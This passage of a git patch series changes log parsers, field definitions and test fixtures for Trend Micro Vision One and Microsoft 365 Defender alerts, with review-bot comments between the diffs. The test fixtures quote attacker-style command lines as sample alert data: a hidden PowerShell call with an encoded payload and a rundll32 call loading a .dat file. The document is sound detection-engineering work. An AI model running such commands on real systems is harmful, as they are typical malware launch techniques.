\"C:\\\\Users\\\\doe.john\\\\Downloads\\\\Advanced_IP_Scanner_2.5.4594.1.exe\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Alert\"]}, {\"id\": 7, \"type\": \"user_account\", \"field\": \"logonUser\", \"value\": \"doe\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Related Asset Enrichment\", \"Alert\"]}, {\"id\": 8, \"type\": \"user_account\", \"field\": \"\", \"value\": \"Syst\\u00e8me\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [], \"provenance\": [\"Related Asset Enrichment\"]}]}", + "message": "{\"schemaVersion\": \"1.15\", \"id\": \"WB-11111-22222222-00000\", \"investigationStatus\": \"New\", \"status\": \"Open\", \"investigationResult\": \"No Findings\", \"workbenchLink\": \"https://portal.eu.xdr.trendmicro.com/index.html#/workbench/alerts/WB-11111-22222222-00000?ref=7ddf32e17a6ac5ce04a8ecbf782ca509\", \"alertProvider\": \"SAE\", \"modelId\": \"fc93e58b-142a-46bd-89b3-0670004728da\", \"model\": \"Internal Network Scanner\", \"modelType\": \"preset\", \"score\": 22, \"severity\": \"low\", \"createdDateTime\": \"2024-07-23T14:46:11Z\", \"updatedDateTime\": \"2024-07-23T14:46:11Z\", \"ownerIds\": [], \"impactScope\": {\"desktopCount\": 1, \"serverCount\": 0, \"accountCount\": 1, \"emailAddressCount\": 0, \"containerCount\": 0, \"cloudIdentityCount\": 0, \"entities\": [{\"entityType\": \"account\", \"entityValue\": \"john\\\\doe\", \"entityId\": \"john\\\\doe\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"relatedIndicatorIds\": [], \"provenance\": [\"Alert\"]}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\", \"name\": \"doe10\", \"ips\": [\"1.2.3.4\"]}, \"entityId\": \"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\", \"relatedEntities\": [\"john\\\\doe\"], 
\"relatedIndicatorIds\": [1, 2, 3, 4, 5, 6, 7, 8], \"provenance\": [\"Sweeping\", \"Alert\"], \"managementScopeGroupId\": \"a008286d-c35c-4b85-85bb-6c744b27c2e7\"}]}, \"description\": \"Detects usage of network scanner to gather information\", \"matchedRules\": [{\"id\": \"1382c167-1c06-4312-89bd-2db0573a0a3e\", \"name\": \"Internal Network Scanning\", \"matchedFilters\": [{\"id\": \"95fa94aa-126d-40a1-92dd-e4427da20897\", \"name\": \"Internal Network Scanning via Famatech Scanner Tools\", \"matchedDateTime\": \"2024-07-23T14:41:48.126Z\", \"mitreTechniqueIds\": [\"T1046\"], \"matchedEvents\": [{\"uuid\": \"47028c1b-ba5b-45ec-98b0-2f62b8ee1665\", \"matchedDateTime\": \"2024-07-23T14:41:48.126Z\", \"type\": \"TELEMETRY_PROCESS\"}]}]}], \"indicators\": [{\"id\": 1, \"type\": \"command_line\", \"field\": \"processCmd\", \"value\": \"C:\\\\WINDOWS\\\\Explorer.EXE\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Alert\"]}, {\"id\": 2, \"type\": \"command_line\", \"field\": \"objectCmd\", \"value\": \"\\\"C:\\\\Users\\\\doe.john\\\\Downloads\\\\Advanced_IP_Scanner_2.5.4594.1.exe\\\" \", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Alert\"]}, {\"id\": 3, \"type\": \"file_sha256\", \"field\": \"objectFileHashSha256\", \"value\": \"E665BB196B40DBB0FA91DBB908DB7DA5065BA28DF9F445AD97C17DF180FF43A1\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Alert\"]}, {\"id\": 4, \"type\": \"file_sha256\", \"field\": \"processFileHashSha256\", \"value\": \"B9AB76C0E991FED29CF07956B7B5E758DB91BEF52E4C0FA810FEF88000506631\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Alert\"]}, {\"id\": 5, \"type\": 
\"fullpath\", \"field\": \"processFilePath\", \"value\": \"C:\\\\Windows\\\\explorer.exe\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Alert\"]}, {\"id\": 6, \"type\": \"fullpath\", \"field\": \"objectFilePath\", \"value\": \"C:\\\\Users\\\\doe.john\\\\Downloads\\\\Advanced_IP_Scanner_2.5.4594.1.exe\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Alert\"]}, {\"id\": 7, \"type\": \"user_account\", \"field\": \"logonUser\", \"value\": \"doe\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Related Asset Enrichment\", \"Alert\"]}, {\"id\": 8, \"type\": \"user_account\", \"field\": \"\", \"value\": \"Syst\\u00e8me\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [], \"provenance\": [\"Related Asset Enrichment\"]}]}", "event": { "category": [ "intrusion_detection" @@ -33,10 +33,6 @@ "product": "Vision One", "vendor": "TrendMicro" }, - "organization": { - "id": "john\\doe", - "name": "john\\doe" - }, "process": { "command_line": "C:\\WINDOWS\\Explorer.EXE", "executable": "C:\\Windows\\explorer.exe", @@ -68,6 +64,8 @@ } }, "user": { + "domain": "doe", + "id": "john\\doe", "name": "doe" } } diff --git a/Trend Micro/trend-micro-vision-one/tests/test_process.json b/Trend Micro/trend-micro-vision-one/tests/test_process.json index d6ef4acd1..560c2ce13 100644 --- a/Trend Micro/trend-micro-vision-one/tests/test_process.json +++ b/Trend Micro/trend-micro-vision-one/tests/test_process.json 
@@ -33,10 +33,6 @@ "product": "Vision One", "vendor": "TrendMicro" }, - "organization": { - "id": "shockwave\\sam", - "name": "shockwave\\sam" - }, "process": { "command_line": "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe -nop -noni -w hidden -enc ......aakaakaekavgaracqaswapackafabjaeuawaa=", "executable": "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe", @@ -50,6 +46,9 @@ ], "ip": [ "10.10.58.51" + ], + "user": [ + "shockwave" ] }, "rule": { @@ -62,6 +61,11 @@ "severity": "high", "status": "Open" } + }, + "user": { + "domain": "sam", + "id": "shockwave\\sam", + "name": "shockwave" } } } \ No newline at end of file diff --git a/Trend Micro/trend-micro-vision-one/tests/test_registry.json b/Trend Micro/trend-micro-vision-one/tests/test_registry.json index 3c32834ae..9159ec844 100644 --- a/Trend Micro/trend-micro-vision-one/tests/test_registry.json +++ b/Trend Micro/trend-micro-vision-one/tests/test_registry.json @@ -29,10 +29,6 @@ "product": "Vision One", "vendor": "TrendMicro" }, - "organization": { - "id": "shockwave\\sam", - "name": "shockwave\\sam" - }, "process": { "command_line": "c:\\windows\\system32\\rundll32.exe c:\\users\\sam\\appdata\\local\\cyzfc.dat entrypoint", "parent": { @@ -52,6 +48,9 @@ "related": { "ip": [ "10.10.58.51" + ], + "user": [ + "shockwave" ] }, "rule": { @@ -68,7 +67,10 @@ } }, "user": { - "email": "support@pctutordetroit.com" + "domain": "sam", + "email": "support@pctutordetroit.com", + "id": "shockwave\\sam", + "name": "shockwave" } } } \ No newline at end of file From e93cd918eba05ba91b7e501ccd72d2f4c383c05d Mon Sep 17 00:00:00 2001 
From: lvoloshyn-sekoia <135212489+lvoloshyn-sekoia@users.noreply.github.com> Date: Tue, 26 Nov 2024 12:10:22 +0200 Subject: [PATCH 72/84] Update Trend Micro/trend-micro-vision-one/ingest/parser.yml MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Co-authored-by: Sébastien Quioc --- Trend Micro/trend-micro-vision-one/ingest/parser.yml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/Trend Micro/trend-micro-vision-one/ingest/parser.yml b/Trend Micro/trend-micro-vision-one/ingest/parser.yml index 3446a59f6..09ca7f331 100644 --- a/Trend Micro/trend-micro-vision-one/ingest/parser.yml +++ b/Trend Micro/trend-micro-vision-one/ingest/parser.yml @@ -41,8 +41,8 @@ stages: user.id: "{{ (parsed_event.message.impactScope.entities | selectattr('entityType', 'equalto', 'account') | first).entityValue }}" - set: - user.name: "{{final.user.id.split('\\\\')[0]}}" - user.domain: "{{final.user.id.split('\\\\')[1]}}" + user.name: "{{final.user.id.split('\\\\') | last}}" + user.domain: "{{final.user.id.split('\\\\') | first}}" filter: "{{final.user.id != null}}" - set: From 454ad36347fe76d2363d7652a1d1a89125f5f15c Mon Sep 17 00:00:00 2001 From: lvoloshyn-sekoia Date: Tue, 26 Nov 2024 12:11:14 +0200 Subject: [PATCH 73/84] Fix tests --- .../tests/test_internal_network_scanner.json | 2 +- Trend Micro/trend-micro-vision-one/tests/test_process.json | 6 +++--- Trend Micro/trend-micro-vision-one/tests/test_registry.json | 6 +++--- 3 files changed, 7 insertions(+), 7 deletions(-) diff --git a/Trend Micro/trend-micro-vision-one/tests/test_internal_network_scanner.json b/Trend Micro/trend-micro-vision-one/tests/test_internal_network_scanner.json index 769477b65..b31951fe2 100644 --- a/Trend Micro/trend-micro-vision-one/tests/test_internal_network_scanner.json +++ b/Trend Micro/trend-micro-vision-one/tests/test_internal_network_scanner.json 
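Review bot: When `final.user.id` contains no backslash, `split('\\\\')` yields a one-element list and both `| first` and `| last` return the whole id, so the new `user.domain` line copies the account name into the domain field instead of leaving it unset. The old `[1]` index presumably rendered an undefined value in that case; the new form silently emits a wrong domain, which matters for anyone pivoting on `user.domain` during an investigation. Guarding the domain assignment on the presence of a separator keeps `user.name` unchanged for bare account names; the enclosing `set` list starts outside the hunk, so the indentation below is inferred. If the engine evaluates `filter` per action, as the existing `filter:` line suggests, splitting the action into two does this without new syntax.
```yaml
      - set:
          user.name: "{{final.user.id.split('\\\\') | last}}"
        filter: "{{final.user.id != null}}"
      - set:
          user.domain: "{{final.user.id.split('\\\\') | first}}"
        filter: "{{final.user.id != null and '\\\\' in final.user.id}}"
```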
@@ -64,7 +64,7 @@ } }, "user": { - "domain": "doe", + "domain": "john", "id": "john\\doe", "name": "doe" } diff --git a/Trend Micro/trend-micro-vision-one/tests/test_process.json b/Trend Micro/trend-micro-vision-one/tests/test_process.json index 560c2ce13..9c013b1c0 100644 --- a/Trend Micro/trend-micro-vision-one/tests/test_process.json +++ b/Trend Micro/trend-micro-vision-one/tests/test_process.json @@ -48,7 +48,7 @@ "10.10.58.51" ], "user": [ - "shockwave" + "sam" ] }, "rule": { @@ -63,9 +63,9 @@ } }, "user": { - "domain": "sam", + "domain": "shockwave", "id": "shockwave\\sam", - "name": "shockwave" + "name": "sam" } } } \ No newline at end of file diff --git a/Trend Micro/trend-micro-vision-one/tests/test_registry.json b/Trend Micro/trend-micro-vision-one/tests/test_registry.json index 9159ec844..83d7e99b5 100644 --- a/Trend Micro/trend-micro-vision-one/tests/test_registry.json +++ b/Trend Micro/trend-micro-vision-one/tests/test_registry.json @@ -50,7 +50,7 @@ "10.10.58.51" ], "user": [ - "shockwave" + "sam" ] }, "rule": { @@ -67,10 +67,10 @@ } }, "user": { - "domain": "sam", + "domain": "shockwave", "email": "support@pctutordetroit.com", "id": "shockwave\\sam", - "name": "shockwave" + "name": "sam" } } } \ No newline at end of file From 0c2434b976a689fa0b51c9337ae42ac599183414 Mon Sep 17 00:00:00 2001 
From: LenaigKaliou Date: Wed, 27 Nov 2024 16:45:52 +0100 Subject: [PATCH 74/84] Changes on custom fields --- .../microsoft-365-defender/_meta/fields.yml | 254 ++++++++---------- .../microsoft-365-defender/ingest/parser.yml | 74 +++-- .../tests/test_device_event.json | 22 +- ...test_device_event_sensitive_file_read.json | 22 +- .../tests/test_device_events_2.json | 4 +- ...test_device_events_get_clipboard_data.json | 22 +- ...test_device_events_powershell_command.json | 22 +- ..._device_events_shell_link_create_file.json | 22 +- .../tests/test_device_file_event.json | 24 +- .../tests/test_device_file_event_02.json | 24 +- .../tests/test_device_image_load_event.json | 10 +- .../tests/test_device_logon_events.json | 6 +- .../tests/test_device_network_events.json | 26 +- .../tests/test_device_process_events.json | 42 ++- .../tests/test_device_process_events_2.json | 42 ++- .../tests/test_device_registry_events.json | 24 +- .../test_devices_events_script_content.json | 4 +- .../tests/test_email_events.json | 22 +- .../tests/test_email_url_info.json | 22 +- .../tests/test_identity_directory.json | 22 +- .../tests/test_identity_info.json | 22 +- .../tests/test_identity_logon.json | 22 +- .../tests/test_identity_query.json | 22 +- .../tests/test_local_ip.json | 22 +- .../tests/test_process_error.json | 12 +- 25 files changed, 364 insertions(+), 446 deletions(-) diff --git a/Microsoft/microsoft-365-defender/_meta/fields.yml b/Microsoft/microsoft-365-defender/_meta/fields.yml index 0e6154ccd..c92ffb8db 100644 --- a/Microsoft/microsoft-365-defender/_meta/fields.yml +++ b/Microsoft/microsoft-365-defender/_meta/fields.yml 
@@ -133,6 +133,78 @@ action.properties.ISP: name: action.properties.ISP type: keyword +action.properties.InitiatingProcessAccountObjectId: + description: Azure AD object ID of the user account that ran the process responsible + for the event + name: action.properties.InitiatingProcessAccountObjectId + type: keyword + +action.properties.InitiatingProcessCommandLine: + description: Process commande Line that initiated the event + name: action.properties.InitiatingProcessCommandLine + type: keyword + +action.properties.InitiatingProcessFileSize: + description: Size of the process (image file) that initiated the event + name: action.properties.InitiatingProcessFileSize + type: long + +action.properties.InitiatingProcessIntegrityLevel: + description: Integrity level of the process that initiated the event. Windows assigns + integrity levels to processes based on certain characteristics, such as if they + were launched from an internet download. These integrity levels influence permissions + to resources + name: action.properties.InitiatingProcessIntegrityLevel + type: keyword + +action.properties.InitiatingProcessLogonId: + description: Identifier for a logon session of the process that initiated the event. + This identifier is unique on the same machine only between restarts. 
+ name: action.properties.InitiatingProcessLogonId + type: keyword + +action.properties.InitiatingProcessTokenElevation: + description: Token type indicating the presence or absence of User Access Control + (UAC) privilege elevation applied to the process that initiated the event + name: action.properties.InitiatingProcessTokenElevation + type: keyword + +action.properties.InitiatingProcessVersionInfoCompanyName: + description: Company name from the version information of the process (image file) + responsible for the event + name: action.properties.InitiatingProcessVersionInfoCompanyName + type: keyword + +action.properties.InitiatingProcessVersionInfoFileDescription: + description: Description from the version information of the process (image file) + responsible for the event + name: action.properties.InitiatingProcessVersionInfoFileDescription + type: keyword + +action.properties.InitiatingProcessVersionInfoInternalFileName: + description: Internal file name from the version information of the process (image + file) responsible for the event + name: action.properties.InitiatingProcessVersionInfoInternalFileName + type: keyword + +action.properties.InitiatingProcessVersionInfoOriginalFileName: + description: Original file name from the version information of the process (image + file) responsible for the event + name: action.properties.InitiatingProcessVersionInfoOriginalFileName + type: keyword + +action.properties.InitiatingProcessVersionInfoProductName: + description: Product name from the version information of the process (image file) + responsible for the event + name: action.properties.InitiatingProcessVersionInfoProductName + type: keyword + +action.properties.InitiatingProcessVersionInfoProductVersion: + description: Product version from the version information of the process (image + file) responsible for the event + name: action.properties.InitiatingProcessVersionInfoProductVersion + type: keyword + action.properties.IsAdminOperation: description: 
Indicates whether the activity was performed by an administrator name: action.properties.IsAdminOperation 
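Review bot: The description of the new `action.properties.InitiatingProcessCommandLine` entry carries over the typo `Process commande Line that initiated the event` from the removed `action.properties.process.CommandLine` block; since these descriptions are likely surfaced to users of the field catalog, suggest `description: Command line of the process that initiated the event`. The same applies to the next hunk of this file, where `action.properties.ProcessIntegrityLevel` reads `from an internet downloaded` and should read `from an internet download`, matching the wording already used for `InitiatingProcessIntegrityLevel` in this hunk.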
@@ -281,6 +353,51 @@ action.properties.PreviousRegistryValueName: name: action.properties.PreviousRegistryValueName type: keyword +action.properties.ProcessIntegrityLevel: + description: Integrity level of the newly created process. Windows assigns integrity + levels to processes based on certain characteristics, such as if they were launched + from an internet downloaded. These integrity levels influence permissions to resources + name: action.properties.ProcessIntegrityLevel + type: keyword + +action.properties.ProcessTokenElevation: + description: Token type indicating the presence or absence of User Access Control + (UAC) privilege elevation applied to the newly created process + name: action.properties.ProcessTokenElevation + type: keyword + +action.properties.ProcessVersionInfoCompanyName: + description: Company name from the version information of the newly created process + name: action.properties.ProcessVersionInfoCompanyName + type: keyword + +action.properties.ProcessVersionInfoFileDescription: + description: Description from the version information of the newly created process + name: action.properties.ProcessVersionInfoFileDescription + type: keyword + +action.properties.ProcessVersionInfoInternalFileName: + description: Internal file name from the version information of the newly created + process + name: action.properties.ProcessVersionInfoInternalFileName + type: keyword + +action.properties.ProcessVersionInfoOriginalFileName: + description: Original file name from the version information of the newly created + process + name: action.properties.ProcessVersionInfoOriginalFileName + type: keyword + +action.properties.ProcessVersionInfoProductName: + description: Product name from the version information of the newly created process + name: action.properties.ProcessVersionInfoProductName + type: keyword + +action.properties.ProcessVersionInfoProductVersion: + description: Product version from the version information of the newly created process + name: 
action.properties.ProcessVersionInfoProductVersion + type: keyword + action.properties.Query: description: String used to run the query name: action.properties.Query 
@@ -412,143 +529,6 @@ action.properties.UserLevelPolicy: name: action.properties.UserLevelPolicy type: keyword -action.properties.process.AccountObjectId: - description: Azure AD object ID of the user account that ran the process responsible - for the event - name: action.properties.process.AccountObjectId - type: keyword - -action.properties.process.CommandLine: - description: Process commande Line that initiated the event - name: action.properties.process.CommandLine - type: keyword - -action.properties.process.FileSize: - description: Size of the process (image file) that initiated the event - name: action.properties.process.FileSize - type: long - -action.properties.process.IntegrityLevel: - description: Integrity level of the newly created process. Windows assigns integrity - levels to processes based on certain characteristics, such as if they were launched - from an internet downloaded. These integrity levels influence permissions to resources - name: action.properties.process.IntegrityLevel - type: keyword - -action.properties.process.LogonId: - description: Identifier for a logon session of the process that initiated the event. - This identifier is unique on the same machine only between restarts. 
- name: action.properties.process.LogonId - type: keyword - -action.properties.process.TokenElevation: - description: Token type indicating the presence or absence of User Access Control - (UAC) privilege elevation applied to the newly created process - name: action.properties.process.TokenElevation - type: keyword - -action.properties.process.VersionInfoCompanyName: - description: Company name from the version information of the newly created process - name: action.properties.process.VersionInfoCompanyName - type: keyword - -action.properties.process.VersionInfoFileDescription: - description: Description from the version information of the newly created process - name: action.properties.process.VersionInfoFileDescription - type: keyword - -action.properties.process.VersionInfoInternalFileName: - description: Internal file name from the version information of the newly created - process - name: action.properties.process.VersionInfoInternalFileName - type: keyword - -action.properties.process.VersionInfoOriginalFileName: - description: Original file name from the version information of the newly created - process - name: action.properties.process.VersionInfoOriginalFileName - type: keyword - -action.properties.process.VersionInfoProductName: - description: Product name from the version information of the newly created process - name: action.properties.process.VersionInfoProductName - type: keyword - -action.properties.process.VersionInfoProductVersion: - description: Product version from the version information of the newly created process - name: action.properties.process.VersionInfoProductVersion - type: keyword - -action.properties.process.parent.AccountObjectId: - description: Azure AD object ID of the user account that ran the parent process - responsible for the event - name: action.properties.process.parent.AccountObjectId - type: keyword - -action.properties.process.parent.CommandLine: - description: Parent process commande Line that initiated the event - 
name: action.properties.process.parent.CommandLine - type: keyword - -action.properties.process.parent.FileSize: - description: Size of the parent process (image file) that initiated the event - name: action.properties.process.parent.FileSize - type: long - -action.properties.process.parent.IntegrityLevel: - description: Integrity level of the parent process that initiated the event. Windows - assigns integrity levels to processes based on certain characteristics, such as - if they were launched from an internet download. These integrity levels influence - permissions to resources - name: action.properties.process.parent.IntegrityLevel - type: keyword - -action.properties.process.parent.LogonId: - description: Identifier for a logon session of the parent process that initiated - the event. This identifier is unique on the same machine only between restarts. - name: action.properties.process.parent.LogonId - type: keyword - -action.properties.process.parent.TokenElevation: - description: Token type indicating the presence or absence of User Access Control - (UAC) privilege elevation applied to the parent process that initiated the event - name: action.properties.process.parent.TokenElevation - type: keyword - -action.properties.process.parent.VersionInfoCompanyName: - description: Company name from the version information of the parent process (image - file) responsible for the event - name: action.properties.process.parent.VersionInfoCompanyName - type: keyword - -action.properties.process.parent.VersionInfoFileDescription: - description: Description from the version information of the parent process (image - file) responsible for the event - name: action.properties.process.parent.VersionInfoFileDescription - type: keyword - -action.properties.process.parent.VersionInfoInternalFileName: - description: Internal file name from the version information of the parent process - (image file) responsible for the event - name: 
action.properties.process.parent.VersionInfoInternalFileName - type: keyword - -action.properties.process.parent.VersionInfoOriginalFileName: - description: '' - name: action.properties.process.parent.VersionInfoOriginalFileName - type: keyword - -action.properties.process.parent.VersionInfoProductName: - description: '' - name: action.properties.process.parent.VersionInfoProductName - type: keyword - -action.properties.process.parent.VersionInfoProductVersion: - description: Product version from the version information of the parent process - (image file) responsible for the event - name: action.properties.process.parent.VersionInfoProductVersion - type: keyword - email.direction: description: The direction of the message based on the sending and receiving domains name: email.direction diff --git a/Microsoft/microsoft-365-defender/ingest/parser.yml b/Microsoft/microsoft-365-defender/ingest/parser.yml index 0a33f577f..fc32171cd 100644 --- a/Microsoft/microsoft-365-defender/ingest/parser.yml +++ b/Microsoft/microsoft-365-defender/ingest/parser.yml 
@@ -263,18 +263,18 @@ stages: process.parent.pid: "{{json_event.message.properties.InitiatingProcessParentId}}" process.parent.name: "{{json_event.message.properties.InitiatingProcessParentFileName | basename}}" process.parent.start: "{{json_event.message.properties.InitiatingProcessParentCreationTime}}" - action.properties.process.AccountObjectId: "{{json_event.message.properties.InitiatingProcessAccountObjectId}}" - action.properties.process.FileSize: "{{json_event.message.properties.InitiatingProcessFileSize}}" - action.properties.process.IntegrityLevel: "{{json_event.message.properties.InitiatingProcessIntegrityLevel}}" - action.properties.process.LogonId: "{{json_event.message.properties.InitiatingProcessLogonId}}" - action.properties.process.TokenElevation: "{{json_event.message.properties.InitiatingProcessTokenElevation or json_event.message.properties.ProcessTokenElevation}}" - action.properties.process.CommandLine: "{{json_event.message.properties.InitiatingProcessCommandLine}}" - action.properties.process.VersionInfoCompanyName: "{{json_event.message.properties.InitiatingProcessVersionInfoCompanyName}}" - action.properties.process.VersionInfoFileDescription: "{{json_event.message.properties.InitiatingProcessVersionInfoFileDescription}}" - action.properties.process.VersionInfoInternalFileName: "{{json_event.message.properties.InitiatingProcessVersionInfoInternalFileName}}" - action.properties.process.VersionInfoOriginalFileName: "{{json_event.message.properties.InitiatingProcessVersionInfoOriginalFileName}}" - action.properties.process.VersionInfoProductName: "{{json_event.message.properties.InitiatingProcessVersionInfoProductName}}" - action.properties.process.VersionInfoProductVersion: "{{json_event.message.properties.InitiatingProcessVersionInfoProductVersion}}" + action.properties.InitiatingProcessAccountObjectId: "{{json_event.message.properties.InitiatingProcessAccountObjectId}}" + action.properties.InitiatingProcessFileSize: 
"{{json_event.message.properties.InitiatingProcessFileSize}}" + action.properties.InitiatingProcessIntegrityLevel: "{{json_event.message.properties.InitiatingProcessIntegrityLevel}}" + action.properties.InitiatingProcessLogonId: "{{json_event.message.properties.InitiatingProcessLogonId}}" + action.properties.InitiatingProcessTokenElevation: "{{json_event.message.properties.InitiatingProcessTokenElevation or json_event.message.properties.ProcessTokenElevation}}" + action.properties.InitiatingProcessCommandLine: "{{json_event.message.properties.InitiatingProcessCommandLine}}" + action.properties.InitiatingProcessVersionInfoCompanyName: "{{json_event.message.properties.InitiatingProcessVersionInfoCompanyName}}" + action.properties.InitiatingProcessVersionInfoFileDescription: "{{json_event.message.properties.InitiatingProcessVersionInfoFileDescription}}" + action.properties.InitiatingProcessVersionInfoInternalFileName: "{{json_event.message.properties.InitiatingProcessVersionInfoInternalFileName}}" + action.properties.InitiatingProcessVersionInfoOriginalFileName: "{{json_event.message.properties.InitiatingProcessVersionInfoOriginalFileName}}" + action.properties.InitiatingProcessVersionInfoProductName: "{{json_event.message.properties.InitiatingProcessVersionInfoProductName}}" + action.properties.InitiatingProcessVersionInfoProductVersion: "{{json_event.message.properties.InitiatingProcessVersionInfoProductVersion}}" - set: process.args: '{{json_event.message.properties.InitiatingProcessCommandLine.split(" ")[1:]}}' 
@@ -307,26 +307,26 @@ stages: process.name: "{{json_event.message.properties.FileName | basename}}" process.command_line: "{{json_event.message.properties.ProcessCommandLine}}" process.working_directory: "{{json_event.message.properties.FolderPath | dirname}}" - action.properties.process.TokenElevation: "{{json_event.message.properties.ProcessTokenElevation}}" - action.properties.process.IntegrityLevel: "{{json_event.message.properties.ProcessIntegrityLevel}}" - action.properties.process.VersionInfoCompanyName: "{{json_event.message.properties.ProcessVersionInfoCompanyName}}" - action.properties.process.VersionInfoFileDescription: "{{json_event.message.properties.ProcessVersionInfoFileDescription}}" - action.properties.process.VersionInfoInternalFileName: "{{json_event.message.properties.ProcessVersionInfoInternalFileName}}" - action.properties.process.VersionInfoOriginalFileName: "{{json_event.message.properties.ProcessVersionInfoOriginalFileName}}" - action.properties.process.VersionInfoProductName: "{{json_event.message.properties.ProcessVersionInfoProductName}}" - action.properties.process.VersionInfoProductVersion: "{{json_event.message.properties.ProcessVersionInfoProductVersion}}" - action.properties.process.parent.AccountObjectId: "{{json_event.message.properties.InitiatingProcessAccountObjectId}}" - action.properties.process.parent.FileSize: "{{json_event.message.properties.InitiatingProcessFileSize}}" - action.properties.process.parent.IntegrityLevel: "{{json_event.message.properties.InitiatingProcessIntegrityLevel}}" - action.properties.process.parent.LogonId: "{{json_event.message.properties.InitiatingProcessLogonId}}" - action.properties.process.parent.TokenElevation: "{{json_event.message.properties.InitiatingProcessTokenElevation}}" - action.properties.process.parent.CommandLine: "{{json_event.message.properties.InitiatingProcessCommandLine}}" - action.properties.process.parent.VersionInfoCompanyName: 
"{{json_event.message.properties.InitiatingProcessVersionInfoCompanyName}}" - action.properties.process.parent.VersionInfoFileDescription: "{{json_event.message.properties.InitiatingProcessVersionInfoFileDescription}}" - action.properties.process.parent.VersionInfoInternalFileName: "{{json_event.message.properties.InitiatingProcessVersionInfoInternalFileName}}" - action.properties.process.parent.VersionInfoOriginalFileName: "{{json_event.message.properties.InitiatingProcessVersionInfoOriginalFileName}}" - action.properties.process.parent.VersionInfoProductName: "{{json_event.message.properties.InitiatingProcessVersionInfoProductName}}" - action.properties.process.parent.VersionInfoProductVersion: "{{json_event.message.properties.InitiatingProcessVersionInfoProductVersion}}" + action.properties.ProcessTokenElevation: "{{json_event.message.properties.ProcessTokenElevation}}" + action.properties.ProcessIntegrityLevel: "{{json_event.message.properties.ProcessIntegrityLevel}}" + action.properties.ProcessVersionInfoCompanyName: "{{json_event.message.properties.ProcessVersionInfoCompanyName}}" + action.properties.ProcessVersionInfoFileDescription: "{{json_event.message.properties.ProcessVersionInfoFileDescription}}" + action.properties.ProcessVersionInfoInternalFileName: "{{json_event.message.properties.ProcessVersionInfoInternalFileName}}" + action.properties.ProcessVersionInfoOriginalFileName: "{{json_event.message.properties.ProcessVersionInfoOriginalFileName}}" + action.properties.ProcessVersionInfoProductName: "{{json_event.message.properties.ProcessVersionInfoProductName}}" + action.properties.ProcessVersionInfoProductVersion: "{{json_event.message.properties.ProcessVersionInfoProductVersion}}" + action.properties.InitiatingProcessAccountObjectId: "{{json_event.message.properties.InitiatingProcessAccountObjectId}}" + action.properties.InitiatingProcessFileSize: "{{json_event.message.properties.InitiatingProcessFileSize}}" + 
action.properties.InitiatingProcessIntegrityLevel: "{{json_event.message.properties.InitiatingProcessIntegrityLevel}}" + action.properties.InitiatingProcessLogonId: "{{json_event.message.properties.InitiatingProcessLogonId}}" + action.properties.InitiatingProcessTokenElevation: "{{json_event.message.properties.InitiatingProcessTokenElevation}}" + action.properties.InitiatingProcessCommandLine: "{{json_event.message.properties.InitiatingProcessCommandLine}}" + action.properties.InitiatingProcessVersionInfoCompanyName: "{{json_event.message.properties.InitiatingProcessVersionInfoCompanyName}}" + action.properties.InitiatingProcessVersionInfoFileDescription: "{{json_event.message.properties.InitiatingProcessVersionInfoFileDescription}}" + action.properties.InitiatingProcessVersionInfoInternalFileName: "{{json_event.message.properties.InitiatingProcessVersionInfoInternalFileName}}" + action.properties.InitiatingProcessVersionInfoOriginalFileName: "{{json_event.message.properties.InitiatingProcessVersionInfoOriginalFileName}}" + action.properties.InitiatingProcessVersionInfoProductName: "{{json_event.message.properties.InitiatingProcessVersionInfoProductName}}" + action.properties.InitiatingProcessVersionInfoProductVersion: "{{json_event.message.properties.InitiatingProcessVersionInfoProductVersion}}" - set: process.parent.args: '{{json_event.message.properties.InitiatingProcessCommandLine.split(" ")[1:]}}' @@ -418,7 +418,6 @@ stages: event.dataset: "device_events" event.category: ["host"] action.properties.RemoteDeviceName: "{{json_event.message.properties.RemoteDeviceName}}" - #action.properties.ProcessTokenElevation: "{{json_event.message.properties.ProcessTokenElevation}}" set_device_file_certificate_info_fields: actions: - set: 
